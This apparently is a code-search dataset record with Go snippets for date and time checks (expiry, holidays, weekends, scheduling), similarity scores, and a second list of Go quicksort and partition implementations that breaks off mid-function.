restaurantBooking.InitialDateTimeChecks(currDate, \"12:00\")\n\tafterRestaurantOpenCheck, _ := restaurantBooking.InitialDateTimeChecks(currDate, \"22:00\")\n\n\tif (beforeRestaurantOpenCheck && afterRestaurantOpenCheck) != expected {\n\t\tt.Fail()\n\t}\n}", "func (a AnyTime) Match(v driver.Value) bool {\n\t_, ok := v.(time.Time)\n\treturn ok\n}", "func (r *record) isExpired(now time.Time) bool {\n\tif r.Expires == 0 {\n\t\treturn false\n\t}\n\texpiryDateUTC := time.Unix(r.Expires, 0).UTC()\n\treturn now.UTC().After(expiryDateUTC)\n}", "func (task *Task) IsExpired() bool {\n\tswitch task.Schedule.Regularity {\n\tcase apiModels.OneTime, apiModels.Trigger:\n\t\treturn common.ValidTime(time.Now().UTC(), task.RunTimeUTC)\n\tcase apiModels.Recurrent:\n\t\treturn !common.ValidTime(task.Schedule.EndRunTime.UTC(), task.RunTimeUTC)\n\t}\n\treturn true\n}", "func EndOfToday() time.Time {\n\treturn EndOfDay(time.Now())\n}", "func IsTimeExpired(timestamp int64, offsetInSeconds float64) bool {\n\ttt := UTCUnixToTime(timestamp)\n\tremainder := tt.Sub(time.Now())\n\tlog.Info(\"remainder: %v calc : %v\", remainder, (remainder.Seconds() + offsetInSeconds))\n\n\treturn !((remainder.Seconds() + offsetInSeconds) > 0)\n}", "func HasPassed(date string) bool {\n\tvar t time.Time = Schedule(date)\n\tvar n = time.Now()\n\treturn n.After(t)\n}", "func (h *Holiday) matches(date time.Time) bool {\n\n\tif h.Func != nil && (date.Year() != h.lastYear || date.Location() != h.lastLoc) {\n\t\th.Month, h.Day = h.Func(date.Year(), date.Location())\n\t\th.lastYear = date.Year()\n\t\th.lastLoc = date.Location()\n\t}\n\n\tif h.Month > 0 {\n\t\tif date.Month() != h.Month {\n\t\t\treturn false\n\t\t}\n\t\tif h.Day > 0 {\n\t\t\treturn date.Day() == h.Day\n\t\t}\n\t\tif h.Weekday > 0 && h.Offset != 0 {\n\t\t\treturn IsWeekdayN(date, h.Weekday, h.Offset)\n\t\t}\n\t} else if h.Offset > 0 {\n\t\treturn date.YearDay() == h.Offset\n\t}\n\treturn false\n}", "func (day DayRange) within(other DayRange) bool {\n\tif day.Wday == other.Wday && day.StartsAt >= other.StartsAt && day.EndsAt <= other.EndsAt {\n\t\treturn true\n\t}\n\treturn false\n}", "func HasPassed(date string) bool {\n\tlayout := \"January 2, 2006 15:04:05\"\n\treturn time.Now().After(ConvertToTime(layout, date))\n}", "func (d Date) Includes(t time.Time) bool {\n\ty0, m0, d0 := t.Date()\n\ty1, m1, d1 := time.Time(d).Date()\n\treturn y0 == y1 && m0 == m1 && d0 == d1\n}", "func checkLocalTimezone() {\n\ttzName, tzOffset := time.Now().Zone()\n\tif time.Duration(tzOffset)*time.Second != tzBeijing {\n\t\tlog.Warn().Msgf(\n\t\t\t\"expected Beijing Timezone (UTC+08), but found %s (UTC%s)\",\n\t\t\ttzName, time.Now().Format(\"-07\"),\n\t\t)\n\t}\n}", "func (x Time) IsZero() bool {\n\treturn time.Time(x).IsZero()\n}", "func (i *info) expired(now int64) bool {\n\treturn i.TTLStamp <= now\n}", "func needCheck(event uint8) bool {\n\tt, ok := lastLimitEvents[event]\n\tif !ok {\n\t\treturn true\n\t}\n\n\treturn time.Now().Sub(t) >= 24*time.Hour\n}", "func DatetimeIsInArray(t time.Time, ta []time.Time) bool {\n\tfor i := range ta {\n\t\tif t.Equal(ta[i]) {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func dailyCheck(maxDuration time.Duration, logger loggerLogger) {\n\tstartTime := time.Now() // we get a new start time here to ensure that it has a monotonic clock\n\tremaining := maxDuration - time.Since(startTime)\n\tlogger.Printf(\"Current time remaining in trial: %d days %v\", remaining/(time.Hour*24), remaining%(time.Hour*24))\n\tticker := time.NewTicker(trialCheckInterval)\n\tfor range ticker.C {\n\t\tremaining := maxDuration - time.Since(startTime)\n\t\tlogger.Printf(\"Current time remaining in trial: %d days %v\", remaining/(time.Hour*24), remaining%(time.Hour*24))\n\t}\n}", "func (t *Time) IsZero() bool {\n\treturn time.Time(*t).IsZero()\n}", "func IsExpired(ctx Context, t UnixTime) bool {\n\tblockNow, err := BlockTime(ctx)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"%+v\", err))\n\t}\n\treturn t <= AsUnixTime(blockNow)\n}", "func (p PodStatusInformation) timeCheck(lastSeen PodStatusInformation, timeSince int) bool {\n\n\tnewPod := p.Seen\n\tLastPod := lastSeen.Seen\n\tdiff := newPod.Sub(LastPod)\n\n\tif diff > (time.Minute * time.Duration(timeSince)) {\n\t\treturn true\n\t}\n\n\treturn false\n\n}", "func (s *server) isBusinessDay(t time.Time, holiday holiday.Holiday) (bool, error) {\n\tisHoliday, err := holiday.IsHoliday(t)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\treturn !(isWeekendDay(t.Weekday()) || isHoliday), nil\n}", "func (i *Info) expired(now int64) bool {\n\treturn i.TTLStamp <= now\n}", "func inTimeSpan(start, end, check time.Time) bool {\n\treturn check.After(start) && check.Before(end)\n}", "func isWeekend(t time.Time) bool {\n\tif (t.Weekday().String() == \"Saturday\") || (t.Weekday().String() == \"Sunday\") {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func TestWhichTimezoneIsMidnightAt(t *testing.T) {\n\n\ts := is.New(t)\n\t// let it be midnight in Greenwich first\n\tutcHour := 0\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), 0)\n\n\t// Rio (-3)\n\tutcHour = 3\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), -3*60*60)\n\n\t// San Francisco (-7)\n\tutcHour = 7\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), -7*60*60)\n\n\t// Honolulu (-10)\n\tutcHour = 10\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), -10*60*60)\n\n\t// Oakland (+13)\n\tutcHour = 11\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), 13*60*60)\n\n\t// Sydney (+10)\n\tutcHour = 14\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), 10*60*60)\n\n\t// Vienna (+2)\n\tutcHour = 22\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, 0), 2*60*60)\n\n\t// Mumbai (+5:30)\n\tutcHour = 18\n\tutcMinute := 30\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, utcMinute), 19800)\n\n\tutcHour = 21\n\tutcMinute = 30\n\ts.Equal(WhichTimezoneIsMidnightAt(utcHour, utcMinute), 10800+30*60)\n\n}", "func greeting() {\n\tt := time.Now()\n\n\tswitch { // switch true\n\tcase t.Hour() < 12:\n\t\tfmt.Println(\"Good morning!\")\n\tcase t.Hour() < 18:\n\t\tfmt.Println(\"Good afternoon!\")\n\tdefault:\n\t\tfmt.Println(\"Good nigth!\")\n\t}\n}", "func WhatDay()string {\n fmt.Printf(\"Testing Testing Testing\")\n switch time.Now().Weekday() {\n case time.Saturday,time.Sunday :\n return \"Weekend\"\n default:\n return \"Weekday\"\n }\n}", "func nowTime() time.Time {\n\treturn time.Now().UTC()\n}", "func (w Winding) IsClockwise() bool { return w == Clockwise }", "func (t *Time) Update() (bool, error) {\n\tnewtime := time.Now()\n\tif newtime.Minute() == t.time.Minute() {\n\t\treturn false, nil\n\t}\n\tt.time = newtime\n\treturn true, nil\n}", "func HasPassed(date string) bool {\n\tt, err := time.Parse(\"January 2, 2006 15:04:05\", date)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn !t.After(time.Now())\n}", "func (t Time) Day() int {}", "func TimeRange(args []string) bool {\n\targc := len(args)\n\tif argc < 1 {\n\t\treturn false\n\t}\n\tfor k, v := range args {\n\t\targs[k] = strings.ToUpper(v)\n\t}\n\tnow := DefaultNower.Now()\n\tisGMT := args[argc-1] == \"GMT\"\n\tif isGMT {\n\t\targc--\n\t\tnow = now.UTC()\n\t}\n\tdate1 := now\n\tdate2 := now\n\tswitch argc {\n\tcase 1:\n\t\ttmp, err := strconv.Atoi(args[0])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\treturn now.Hour() == tmp\n\tcase 2:\n\t\ttmp1, err := strconv.Atoi(args[0])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\ttmp2, err := strconv.Atoi(args[1])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\tif tmp2 < tmp1 {\n\t\t\ttmp1, tmp2 = tmp2, tmp1\n\t\t}\n\t\treturn tmp1 <= now.Hour() && now.Hour() < tmp2\n\tcase 6:\n\t\ts1, err := strconv.Atoi(args[2])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\ts2, err := strconv.Atoi(args[5])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\tdate1 = time.Date(\n\t\t\tdate1.Year(),\n\t\t\tdate1.Month(),\n\t\t\tdate1.Day(),\n\t\t\tdate1.Hour(),\n\t\t\tdate1.Minute(),\n\t\t\ts1,\n\t\t\tdate1.Nanosecond(),\n\t\t\tdate1.Location(),\n\t\t)\n\t\tdate2 = time.Date(\n\t\t\tdate2.Year(),\n\t\t\tdate2.Month(),\n\t\t\tdate2.Day(),\n\t\t\tdate2.Hour(),\n\t\t\tdate2.Minute(),\n\t\t\ts2,\n\t\t\tdate2.Nanosecond(),\n\t\t\tdate2.Location(),\n\t\t)\n\t\tfallthrough\n\tcase 4:\n\t\tmiddle := argc / 2\n\t\th1, err := strconv.Atoi(args[0])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\tm1, err := strconv.Atoi(args[1])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\th2, err := strconv.Atoi(args[middle])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\tm2, err := strconv.Atoi(args[middle+1])\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t\tdate1 = time.Date(\n\t\t\tdate1.Year(),\n\t\t\tdate1.Month(),\n\t\t\tdate1.Day(),\n\t\t\th1,\n\t\t\tm1,\n\t\t\tdate1.Second(),\n\t\t\tdate1.Nanosecond(),\n\t\t\tdate1.Location(),\n\t\t)\n\t\tdate2 = time.Date(\n\t\t\tdate2.Year(),\n\t\t\tdate2.Month(),\n\t\t\tdate2.Day(),\n\t\t\th2,\n\t\t\tm2,\n\t\t\tdate2.Second(),\n\t\t\tdate2.Nanosecond(),\n\t\t\tdate2.Location(),\n\t\t)\n\t\tbreak\n\tdefault:\n\t\treturn false\n\t}\n\tvar (\n\t\tnano = now.UnixNano()\n\t\tnano1 = date1.UnixNano()\n\t\tnano2 = date2.UnixNano()\n\t)\n\tif nano2 < nano1 {\n\t\tnano1, nano2 = nano2, nano1\n\t}\n\treturn (nano1 <= nano) && (nano < nano2)\n}", "func Within(ts int64, seconds int64) bool {\n\tnow := time.Now().Unix()\n\treturn now > ts-seconds && now < ts+seconds\n}", "func (r *RenewalInfoResponse) ShouldRenewAt(now time.Time, willingToSleep time.Duration) *time.Time {\n\t// Explicitly convert all times to UTC.\n\tnow = now.UTC()\n\tstart := r.SuggestedWindow.Start.UTC()\n\tend := r.SuggestedWindow.End.UTC()\n\n\t// Select a uniform random time within the suggested window.\n\twindow := end.Sub(start)\n\trandomDuration := time.Duration(rand.Int63n(int64(window)))\n\trt := start.Add(randomDuration)\n\n\t// If the selected time is in the past, attempt renewal immediately.\n\tif rt.Before(now) {\n\t\treturn &now\n\t}\n\n\t// Otherwise, if the client can schedule itself to attempt renewal at exactly the selected time, do so.\n\twillingToSleepUntil := now.Add(willingToSleep)\n\tif willingToSleepUntil.After(rt) || willingToSleepUntil.Equal(rt) {\n\t\treturn &rt\n\t}\n\n\t// TODO: Otherwise, if the selected time is before the next time that the client would wake up normally, attempt renewal immediately.\n\n\t// Otherwise, sleep until the next normal wake time, re-check ARI, and return to Step 1.\n\treturn nil\n}", "func (c *scheduleReconciler) ifDue(schedule *velerov1.Schedule, cronSchedule cron.Schedule) bool {\n\tisDue, nextRunTime := getNextRunTime(schedule, cronSchedule, c.clock.Now())\n\tlog := c.logger.WithField(\"schedule\", kube.NamespaceAndName(schedule))\n\n\tif !isDue {\n\t\tlog.WithField(\"nextRunTime\", nextRunTime).Debug(\"Schedule is not due, skipping\")\n\t\treturn false\n\t}\n\n\treturn true\n}" ]
[ "0.6837422", "0.68246526", "0.66332364", "0.6369505", "0.59788275", "0.58758134", "0.5860154", "0.58266675", "0.5822932", "0.5798924", "0.57924026", "0.578373", "0.5771897", "0.5766363", "0.5752725", "0.56679946", "0.55978906", "0.5531325", "0.55143285", "0.550681", "0.55047315", "0.5498388", "0.549744", "0.5469003", "0.5464591", "0.545078", "0.541419", "0.54096645", "0.5408599", "0.5396708", "0.538891", "0.5380126", "0.53702873", "0.5341304", "0.5332072", "0.5329797", "0.531947", "0.5315879", "0.5295809", "0.5282935", "0.5278757", "0.5268736", "0.5267514", "0.52445096", "0.5243015", "0.5218941", "0.5207819", "0.51866883", "0.51707876", "0.5164412", "0.51634043", "0.51586705", "0.51561", "0.5155284", "0.51380926", "0.5121887", "0.51193476", "0.51092774", "0.5100155", "0.5098838", "0.5090182", "0.50702834", "0.5069672", "0.5066612", "0.5054069", "0.5050584", "0.50427055", "0.5040567", "0.5040045", "0.50290084", "0.5014052", "0.5011783", "0.49977148", "0.49843958", "0.4978153", "0.49767768", "0.4942423", "0.4938786", "0.49381045", "0.49311942", "0.49260992", "0.4921029", "0.4919447", "0.4904406", "0.49002844", "0.48934713", "0.48903555", "0.48887655", "0.48721403", "0.4871421", "0.48694903", "0.48631537", "0.4857728", "0.48460138", "0.48428187", "0.48417565", "0.4834261", "0.48303443", "0.48230156", "0.4820804" ]
0.53761876
32
/ the mian enter of algorithm of quicksort
func (idx *IndexBuf)quickSort(s, t int) { if t < 0 {return} m := idx.split(s, t) for s > t { idx.quickSort(s, m-1) idx.quickSort(m+1, t) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func qsort(a []int, start, end int) {\n\tif start >= end {\n\t\treturn\n\t}\n\tif end >= len(a) {\n\t\tend = len(a) - 1\n\t}\n\tpivot := a[(start+end)/2]\n\n\ti := start\n\tj := end\n\tfor {\n\t\tfor ; i <= end && a[i] < pivot; i++ {\n\t\t}\n\t\tfor ; j >= start && a[j] > pivot; j-- {\n\t\t}\n\t\tif i >= j {\n\t\t\tbreak\n\t\t}\n\t\ta[i], a[j] = a[j], a[i]\n\t\ti++\n\t\tj--\n\t}\n\tqsort(a, start, i-1)\n\tqsort(a, j+1, end)\n}", "func quicksort(ar []int, p, q int, increasing bool) {\n\tif p < q {\n\t\tg := rand.Intn(q) //Using a random no. as pivot\n\t\tfor ; g < p; g = rand.Intn(q) {\n\t\t} //g is the random index in [p,q)\n\t\tswap(ar, g, q-1) //Swaping pivot from last element in array\n\t\tx := partition(ar, p, q, increasing)\n\t\tquicksort(ar, p, x, increasing)\n\t\tquicksort(ar, x+1, q, increasing)\n\n\t}\n}", "func quicksort(result []models.CabInfo, leftIndex int, rightIndex int) {\n\n\tif leftIndex >= rightIndex {\n\t\treturn\n\t}\n\tpivot := result[rightIndex].Distance\n\n\tcnt := leftIndex\n\n\tfor i := leftIndex; i <= rightIndex; i++ {\n\n\t\tif result[i].Distance <= pivot {\n\t\t\tswap(&result[cnt], &result[i])\n\t\t\tcnt++\n\t\t}\n\t}\n\tquicksort(result, leftIndex, cnt-2)\n\tquicksort(result, cnt, rightIndex)\n}", "func QuickSort(array []int) {\n\t//TODO: implement this\n}", "func quick(data []int, lo, hi int) {\n\n\tif hi-lo < 1 {\n\t\treturn\n\t}\n\tif hi-lo == 1 {\n\t\tif data[lo] > data[hi] {\n\t\t\tdata[lo], data[hi] = data[hi], data[lo]\n\t\t\treturn\n\t\t}\n\t\treturn\n\t}\n\n\tpivot := data[lo]\n\n\ta, b := lo+1, hi\n\n\tfor a <= b {\n\t\tif data[a] <= pivot {\n\t\t\tdata[a], data[a-1] = data[a-1], data[a]\n\t\t\ta++\n\t\t} else {\n\t\t\tdata[b], data[a] = data[a], data[b]\n\t\t\tb--\n\t\t}\n\t}\n\tif lo < b-1 {\n\t\tquick(data, lo, b-1)\n\t}\n\tif a < hi {\n\t\tquick(data, a, hi)\n\t}\n}", "func QSort(list []int, n int) {\n\tif n <= 1 {\n\t\treturn\n\t}\n\n\tpivot := list[0]\n\thead, tail := 0, n-1\n\n\tfor i := 1; i <= tail; {\n\t\tif list[i] > pivot {\n\t\t\tlist[i], list[tail] = list[tail], list[i]\n\t\t\ttail--\n\t\t} else {\n\t\t\tlist[i], list[head] = list[head], list[i]\n\t\t\thead++\n\t\t\ti++\n\t\t}\n\t}\n\n\tfrontPart := list[:head]\n\tlatterPart := list[head+1:]\n\n\tQSort(frontPart, len(frontPart))\n\tQSort(latterPart, len(latterPart))\n}", "func quickSort(a []int, length int) {\n\tif length < 2 {\n\t\treturn\n\t}\n\tmax := 0\n\tfor i := 0; i < length; i++ {\n\t\tif a[max] <= a[i] {\n\t\t\tmax = i\n\t\t}\n\t}\n\ta[length-1], a[max] = a[max], a[length-1]\n\tquickSort(a, length-1)\n}", "func qsort(l []int) {\n\tn := len(l)\n\tif n < 2 {\n\t\treturn\n\t}\n\tpos := 0\n\tpiv := &l[n-1]\n\tfor i := range l {\n\t\tif l[i] < *piv {\n\t\t\tl[i], l[pos] = l[pos], l[i]\n\t\t\tpos++\n\t\t}\n\t}\n\tl[pos], *piv = *piv, l[pos]\n\tqsort(l[:pos])\n\tqsort(l[pos+1:])\n}", "func qsort_naive(array []int) {\n\ttemp := make([]int, len(array))\n\tcopy(temp, array)\n\t// randomly choose the middle element as the pivot\n\tpivotIndex := int(len(array) / 2)\n\tpivot := array[pivotIndex]\n\n\tfor _, i := range temp {\n\t\tl := 0\n\t\tif i > pivot {\n\t\t\tarray[l] = i\n\t\t\tl++\n\t\t}\n\t}\n\n\t// wait, I don't even know how this works\n\t// don't know where the pivot is going to end up in the list\n\t// I guess that's what bentley's sort is so cool being in-place\n}", "func DjikstraQuickSort(a Sortable) {\n goalgo.Shuffle(a)\n djikstraQuickSort(a, 0, a.Size() - 1)\n}", "func main() {\n\tar := []int{3, 4, 1, 2, 5, 7, -1, 0}\n\tQuicksort(ar)\n\tfmt.Println(ar)\n}", "func Quicksort(A su.Interface) su.Interface {\n\tB := A\n\n\tn := A.Len()\n\tquicksort(B, 0, n-1)\n\n\t// for left, right := 0, B.Len()-1; left < right; left, right = left+1, right-1 {\n\t// \tB.Swap(left, right)\n\t// }\n\treturn B\n}", "func quickSort(data QuickSorter, left, right int, wg *sync.WaitGroup) {\n\tdefer func() {\n\t\tif wg != nil {\n\t\t\twg.Done()\n\t\t}\n\t}()\n\n\tif left < right {\n\t\tp := partition(data, left, right)\n\n\t\tvar wait sync.WaitGroup\n\t\twait.Add(2)\n\t\tgo quickSort(data, left, p, &wait)\n\t\tgo quickSort(data, p+1, right, &wait)\n\t\twait.Wait()\n\t}\n}", "func QuickSort(a []int, lo, hi int) {\n\tif lo >= hi {\n\t\treturn\n\t}\n\n\tvar j = partition(a, lo, hi)\n\tQuickSort(a, lo, j)\n\tQuickSort(a, j+1, hi)\n}", "func QuickSort(list []int) {\n\tif len(list) <= 1 {\n\t\treturn\n\t}\n\n\tleft := 0\n\tright := len(list) - 1\n\tmid := list[0]\n\n\tfor left < right {\n\t\tfor list[right] > mid && left < right {\n\t\t\tright--\n\t\t}\n\n\t\tif left < right {\n\t\t\tlist[left] = list[right]\n\t\t\tleft++\n\t\t}\n\n\t\tfor list[left] < mid && left < right {\n\t\t\tleft++\n\t\t}\n\n\t\tif left < right {\n\t\t\tlist[right] = list[left]\n\t\t\tright--\n\t\t}\n\t}\n\n\tlist[left] = mid\n\n\tQuickSort(list[:left])\n\tQuickSort(list[left+1:])\n}", "func Quicksort(A []int64, s Strategy) int {\n\tif len(A) < 2 {\n\t\treturn 0\n\t}\n\n\tp := Partition(A, s(A))\n\n\tcl := 0\n\tif p > 0 {\n\t\tcl = Quicksort(A[:p], s)\n\t}\n\n\tcr := 0\n\tif p < len(A) {\n\t\tcr = Quicksort(A[p+1:], s)\n\t}\n\n\t// the total number of comparisons is composed of the following ones:\n\t// 1. around the pivot in the current recursion (= len(A)-1)\n\t// 2. all recursions left to the pivot\n\t// 3. all recursions right to the pivot\n\tcmp := len(A) - 1 + cl + cr\n\treturn cmp\n}", "func QuickSort(a Sortable) {\n goalgo.Shuffle(a)\n quickSort(a, 0, a.Size() - 1)\n}", "func qsortImpl(a []int, start, end int) {\n if end - start > 1 {\n q := randomPartition(a, start, end)\n qsortImpl(a, start, q)\n qsortImpl(a, q+1, end)\n }\n}", "func QuickSort(InpArr []int, low, high int) {\n\tif low < high {\n\t\tj := Partition(InpArr, low, high)\n\t\tQuickSort(InpArr, low, j)\n\t\tQuickSort(InpArr, j+1, high)\n\t}\n}", "func (qs quickSort) sortAlgo() []int {\n\tfmt.Println(\"\\nQuickSort Implementation\")\n\tarry := quickSortprominent(unSortAr[:])\n\treturn arry[:]\n}", "func QuickSort(list []int, n int) {\n\tif n <= 1 {\n\t\treturn\n\t}\n\n\tseparateSort(list, 0, n-1)\n}", "func QuickSort(arr []int64, start int, end int) {\n\tquickSort(arr, start, end)\n}", "func QuickSort(s sortable, isAscending bool) {\n\tascending = isAscending\n\tsort(s, 0, s.Len()-1)\n}", "func (s *quicksort) partition(slice []int, low, high int) int {\n\tpivotIdx := s.FindPivotIndex(slice, low, high)\n\n\tpivot := slice[pivotIdx]\n\ti := low\n\tj := high\n\n\tfor {\n\t\tfor ; slice[i] < pivot; i++ {\n\n\t\t}\n\t\tfor ; slice[j] > pivot; j-- {\n\n\t\t}\n\t\tif i >= j {\n\t\t\treturn j\n\t\t}\n\t\t// Do swap\n\t\ttemp := slice[i]\n\t\tslice[i] = slice[j]\n\t\tslice[j] = temp\n\t}\n}", "func Quicksort(a []int) []int {\n\tif len(a) <= 1 {\n\t\treturn a\n\t}\n\n\tleftIndex, rightIndex := 0, len(a)-1\n\n\tpivotPoint := len(a) / 2\n\n\ta[pivotPoint], a[rightIndex] = a[rightIndex], a[pivotPoint]\n\n\tfor i := range a {\n\t\tif a[i] < a[rightIndex] {\n\t\t\ta[leftIndex], a[i] = a[i], a[leftIndex]\n\t\t\tleftIndex++\n\t\t}\n\t}\n\ta[leftIndex], a[rightIndex] = a[rightIndex], a[leftIndex]\n\n\tQuicksort(a[:leftIndex])\n\tQuicksort(a[leftIndex+1:])\n\n\treturn a\n}", "func qsort_inner(a []float64, b []int) ([]float64, []int) {\r\n\tif len(a) < 2 {\r\n\t\treturn a, b\r\n\t}\r\n\r\n\tleft, right := 0, len(a)-1\r\n\r\n\t// Pick a pivot\r\n\tpivotIndex := rand.Int() % len(a)\r\n\r\n\t// Move the pivot to the right\r\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\r\n\tb[pivotIndex], b[right] = b[right], b[pivotIndex]\r\n\r\n\t// Pile elements smaller than the pivot on the left\r\n\tfor i := range a {\r\n\t\tif a[i] < a[right] {\r\n\t\t\ta[i], a[left] = a[left], a[i]\r\n\t\t\tb[i], b[left] = b[left], b[i]\r\n\t\t\tleft++\r\n\t\t}\r\n\t}\r\n\t// Place the pivot after the last smaller element\r\n\ta[left], a[right] = a[right], a[left]\r\n\tb[left], b[right] = b[right], b[left]\r\n\r\n\t// Go down the rabbit hole\r\n\tqsort_inner(a[:left], b[:left])\r\n\tqsort_inner(a[left+1:], b[left+1:])\r\n\r\n\treturn a, b\r\n}", "func QuickSort(arr []int) []int {\n\tif len(arr) < 2 {\n\t\treturn arr\n\t}\n\tleft := 0\n\tright := len(arr) - 1\n\tpivot := rand.Int() % len(arr)\n\n\tarr[pivot], arr[right] = arr[right], arr[pivot]\n\n\tfor i := range arr {\n\t\tif arr[i] < arr[right] {\n\t\t\tarr[left], arr[i] = arr[i], arr[left]\n\t\t\tleft++\n\t\t}\n\t}\n\n\tarr[left], arr[right] = arr[right], arr[left]\n\n\tQuickSort(arr[:left])\n\tQuickSort(arr[left+1:])\n\n\treturn arr\n}", "func partition(slc []int, low int, high int) int {\n\n\n\tpivot := slc[high]\n\ti := low - 1 // index of smaller element\n\n\tfor j := low; j < high; j++ {\n\t\t// If current element is smaller than or\n\t\t// equal to pivot\n\t\tif slc[j] <= pivot {\n\t\t\ti++\n\n\t\t\t// swap arr[i] and arr[j]\n\t\t\ttemp := slc[i]\n\t\t\tslc[i] = slc[j]\n\t\t\tslc[j] = temp\n\t\t}\n\t}\n\n\t// swap arr[i+1] and arr[high] (or pivot)\n\ttemp := slc[i + 1]\n\tslc[i + 1] = slc[high]\n\tslc[high] = temp\n\n\treturn i + 1\n}", "func qsort(a []*resultData) []*resultData {\n\tif len(a) < 2 {\n\t\treturn a\n\t}\n\n\tleft, right := 0, len(a)-1\n\n\t// Pick a pivot\n\tpivotIndex := rand.Int() % len(a)\n\n\t// Move the pivot to the right\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\n\n\t// Pile elements smaller than the pivot on the left\n\tfor i := range a {\n\t\tif a[i].Date > a[right].Date {\n\t\t\ta[i], a[left] = a[left], a[i]\n\t\t\tleft++\n\t\t}\n\t}\n\n\t// Place the pivot after the last smaller element\n\ta[left], a[right] = a[right], a[left]\n\n\t// Go down the rabbit hole\n\tqsort(a[:left])\n\tqsort(a[left+1:])\n\n\treturn a\n}", "func TestQuickSort(t *testing.T) {\n\tvar nums []int = utils.RandNums(100000000)\n\tQuickSort(nums, 0, len(nums)-1)\n}", "func QuickSort(arr []int) []int {\n\tn := len(arr)\n\tif n <= 1 {\n\t\treturn arr\n\t}\n\n\tpivot := arr[0]\n\n\tright := make([]int, 0)\n\tleft := make([]int, 0)\n\tfor i := 1; i <= n-1; i++ {\n\t\tif arr[i] <= pivot {\n\t\t\tleft = append(left, arr[i])\n\t\t} else {\n\t\t\tright = append(right, arr[i])\n\t\t}\n\t}\n\n\tr := QuickSort(right)\n\tl := QuickSort(left)\n\treturn append(append(l, pivot), r...)\n\n}", "func Qsort(a []int) {\n qsortImpl(a, 0, len(a))\n}", "func QuickSort(data QuickSorter) {\n\tquickSort(data, 0, data.Len()-1, nil)\n}", "func sort(slc []int, low int, high int) {\n\n\tvar pi int\n\n\tif (low < high) {\n\n\t\t/* pi is partitioning index, arr[pi] is\n \t\tnow at right place */\n\t\tpi = partition(slc, low, high)\n\n\t\t// Recursively sort elements before\n\t\t// partition and after partition\n\t\tgo sort(slc, low, pi-1)\n\t\tgo sort(slc, pi+1, high)\n\t}\n}", "func QuickSort(pairs []Pair) []Pair {\n\tif len(pairs) < 2 {\n\t\treturn pairs\n\t}\n\tleft, right := 0, len(pairs)-1\n\tpivot := rand.Int() % len(pairs)\n\tpairs[pivot], pairs[right] = pairs[right], pairs[pivot]\n\tfor i := range pairs {\n\t\tif pairs[i].distance < pairs[right].distance {\n\t\t\tpairs[left], pairs[i] = pairs[i], pairs[left]\n\t\t\tleft++\n\t\t}\n\t}\n\tpairs[left], pairs[right] = pairs[right], pairs[left]\n\tQuickSort(pairs[:left])\n\tQuickSort(pairs[left+1:])\n\treturn pairs\n}", "func QuicksortByRank(cs []Customer , left int, right int) {\n\tif left < right {\n\t\tpivot := partitionByRank(cs, left, right)\n\t\tQuicksortByRank(cs, left, pivot - 1)\n\t\tQuicksortByRank(cs, pivot + 1, right)\n\t}\n}", "func sort(s []int) {\n\n if len(s) < 2 {\n return\n }\n\n if len(s) == 2 {\n if s[0] > s[1] {\n temp := s[1]\n s[1] = s[0]\n s[0] = temp\n return\n }\n }\n left := 0\n right := len(s) - 1\n quicksort(s, left, right)\n}", "func TestQuickSort(t *testing.T) {\n\tlist := utils.GetArrayOfSize(1e1)\n\tsort(list)\n\tfail := false\n\tfor i := 0; i < len(list)-2; i++ {\n\t\tif list[i] > list[i+1] {\n\t\t\tfmt.Println(\"Error!\")\n\t\t\t// Output: Error!\n\t\t\tt.Error()\n\t\t\tfail = true\n\t\t}\n\t}\n\tif !fail {\n\t\tfmt.Println(\"Success!\")\n\t\t// Output: Success!\n\t}\n}", "func qsort(s []int, quit chan int, get_p_index func([]int) int) {\n\tif len(s) <= 1 {\n\t\tquit <- 0\n\t\treturn\n\t}\n\tvar p_index int\n\tif get_p_index == nil {\n\t\tp_index = (len(s) - 1) / 2\n\t} else {\n\t\tp_index = get_p_index(s)\n\t}\n\n\tl := partition(s, p_index)\n\n\tq := make(chan int)\n\tgo qsort(s[:l], q, get_p_index)\n\tgo qsort(s[l+1:], q, get_p_index)\n\t<-q\n\t<-q\n\tquit <- 0\n}", "func QuickSort3(arr []int) {\n\tlength := len(arr)\n\tif length <= 1 {\n\t\treturn\n\t}\n\tpivot := arr[length-1]\n\tlow := -1\n\tfor i := 0; i < length-1; i++ {\n\t\t// move the elem bigger than pivot to the right side.\n\t\tif arr[i] <= pivot {\n\t\t\tlow++\n\t\t\tarr[i], arr[low] = arr[low], arr[i]\n\t\t}\n\t}\n\t// swap the pivot to the mid position.\n\t// low + 1 point to elem > pivot.\n\tarr[length-1], arr[low+1] = arr[low+1], arr[length-1]\n\tQuickSort3(arr[:low])\n\tQuickSort3(arr[low+1:])\n}", "func partition(a []int, start, end int) int {\n pivot := a[end-1]\n i := start - 1\n for j := start; j < end-1; j++ {\n if a[j] < pivot {\n i++\n a[i], a[j] = a[j], a[i]\n }\n }\n a[i+1], a[end-1] = a[end-1], a[i+1]\n return i+1\n}", "func QuickSortInt(arr *[]int, low int, high int) {\n\tif low < high {\n\t\t/* pi is partitioning index, arr[p] is now at right place */\n\t\tpi := 